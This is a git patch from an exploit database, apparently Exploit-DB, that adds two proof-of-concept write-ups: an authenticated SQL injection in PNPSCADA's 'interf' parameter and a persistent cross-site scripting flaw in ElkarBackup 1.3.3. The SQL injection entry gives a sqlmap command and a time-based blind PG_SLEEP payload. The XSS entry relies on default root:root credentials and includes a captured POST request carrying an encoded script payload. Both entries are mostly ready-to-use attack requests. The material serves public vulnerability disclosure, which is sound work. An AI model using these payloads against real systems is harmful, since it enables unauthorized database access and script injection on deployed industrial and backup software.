From caf6833937b06aa55aeaa999f488257fa45b0a83 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 21 Aug 2020 05:01:48 +0000 Subject: [PATCH] DB: 2020-08-21 2 changes to exploits/shellcodes ElkarBackup 1.3.3 - Persistent Cross-Site Scripting PNPSCADA 2.200816204020 - 'interf' SQL Injection (Authenticated) --- exploits/hardware/webapps/48757.txt | 57 +++++++++++++++++++++++++++++ exploits/php/webapps/48756.txt | 40 ++++++++++++++++++++ files_exploits.csv | 2 + 3 files changed, 99 insertions(+) create mode 100644 exploits/hardware/webapps/48757.txt create mode 100644 exploits/php/webapps/48756.txt diff --git a/exploits/hardware/webapps/48757.txt b/exploits/hardware/webapps/48757.txt new file mode 100644 index 000000000..0802fe7d1 --- /dev/null +++ b/exploits/hardware/webapps/48757.txt @@ -0,0 +1,57 @@ +# Exploit Title: PNPSCADA 2.200816204020 - 'interf' SQL Injection (Authenticated) +# Google Dork: - +# Date: 2020-08-17 +# Exploit Author: İsmail ERKEK +# Vendor Homepage: http://wiki.pnpscada.com/forumHome.jsp +# Version: 2.200816204020 +# Tested on: - + + +1. Description: +---------------------- + +PNPSCADA 2.200816204020 allows SQL Injection via parameter 'interf' in +/browse.jsp. Exploiting this issue could allow an attacker to compromise +the application, access or modify data, or exploit latent vulnerabilities +in the underlying database. + +2. Proof of Concept: +---------------------- + +In Burpsuite intercept the request from one of the affected pages with +'interf' parameter and save it like fuel.req Then run SQLmap to extract the +data from the database: + +sqlmap -r req-pnp-browse.txt --risk=3 --level=5 --dbs --random-agent + +3. Example payload: +---------------------- + +(time-based blind) + +memh=803509994960085058&searchStr=&replaceId=k1&multiple=yes&interf=115 AND +6380=(SELECT 6380 FROM PG_SLEEP(5))&page=1&mselect=98831 + +4. Burpsuite request: +---------------------- + +POST /browse.jsp HTTP/1.1 +Host: 127.0.0.1 +Accept-Encoding: gzip, deflate +Accept: */* +Accept-Language: en +User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; +Trident/5.0) +Connection: close +Referer: +http://127.0.0.1/browse.jsp?memh=2510775194362297745&interf=115&replaceId=k1&multiple=yes +Content-Type: application/x-www-form-urlencoded +Content-Length: 93 +Cookie: wiki=; psl=7465737433; JSESSIONID=1ojrclvd94cpfebapnqebli37 + +memh=803509994960085058&searchStr=*&replaceId=k1&multiple=yes&interf=115*&page=1&mselect=98831 + + + +Best Regards. +Ek alanı \ No newline at end of file diff --git a/exploits/php/webapps/48756.txt b/exploits/php/webapps/48756.txt new file mode 100644 index 000000000..ca34b20d6 --- /dev/null +++ b/exploits/php/webapps/48756.txt @@ -0,0 +1,40 @@ +# Exploit Title: ElkarBackup 1.3.3 - Persistent Cross-Site Scripting +# Date: 2020-08-14 +# Exploit Author: Enes Özeser +# Vendor Homepage: https://www.elkarbackup.org/ +# Version: 1.3.3 +# Tested on: Linux + +1- Go to following url. >> http://(HOST)/elkarbackup/login +2- Default username and password is root:root. We must know login credentials. +3- Go to "Jobs" and press "Add client" button. +4- Write XSS payload in "Name" section. +5- Press "Save" button. + +(( Executable XSS Payloads )) + +1- "> +2- "> +3- "> +4- "> + + +(( REQUEST )) + +POST /elkarbackup/client/2 HTTP/1.1 +Host: (HOST) +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://(HOST)/elkarbackup/client/2 +Content-Type: application/x-www-form-urlencoded +Content-Length: 358 +Connection: close +Cookie: PHPSESSID=dop3m1qj8c5octaxuasd21as2 +Upgrade-Insecure-Requests: 1 + +Client%5Bname%5D=%22%3E%3Cscript%3Ealert%28%22XSS+Confirmed%21%22%29%3C%2Fscript%3E& +Client%5Burl%5D=&Client%5Bquota%5D=-1&Client%5Bdescription%5D=&Client%5BisActive%5D=1& +Client%5BmaxParallelJobs%5D=1&Client%5Bowner%5D=1&Client%5BsshArgs%5D=&Client%5BrsyncShortArgs%5D=& +Client%5BrsyncLongArgs%5D=&Client%5B_token%5D=yrL8pXqx-sTVYhLQBpL523I-BOnSqoRyZnd5MUt2bfI \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 86e76fefb..493c5d106 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -42996,3 +42996,5 @@ id,file,description,date,author,type,platform,port 48752,exploits/php/webapps/48752.txt,"Pharmacy Medical Store and Sale Point 1.0 - 'catid' SQL Injection",2020-08-18,"Moaaz Taha",webapps,php, 48753,exploits/php/webapps/48753.txt,"Savsoft Quiz 5 - Stored Cross-Site Scripting",2020-08-18,"Mayur Parmar",webapps,php, 48755,exploits/hardware/webapps/48755.txt,"Ruijie Networks Switch eWeb S29_RGOS 11.4 - Directory Traversal",2020-08-19,Tuygun,webapps,hardware, +48756,exploits/php/webapps/48756.txt,"ElkarBackup 1.3.3 - Persistent Cross-Site Scripting",2020-08-20,"Enes Özeser",webapps,php, +48757,exploits/hardware/webapps/48757.txt,"PNPSCADA 2.200816204020 - 'interf' SQL Injection (Authenticated)",2020-08-20,"İsmail ERKEK",webapps,hardware,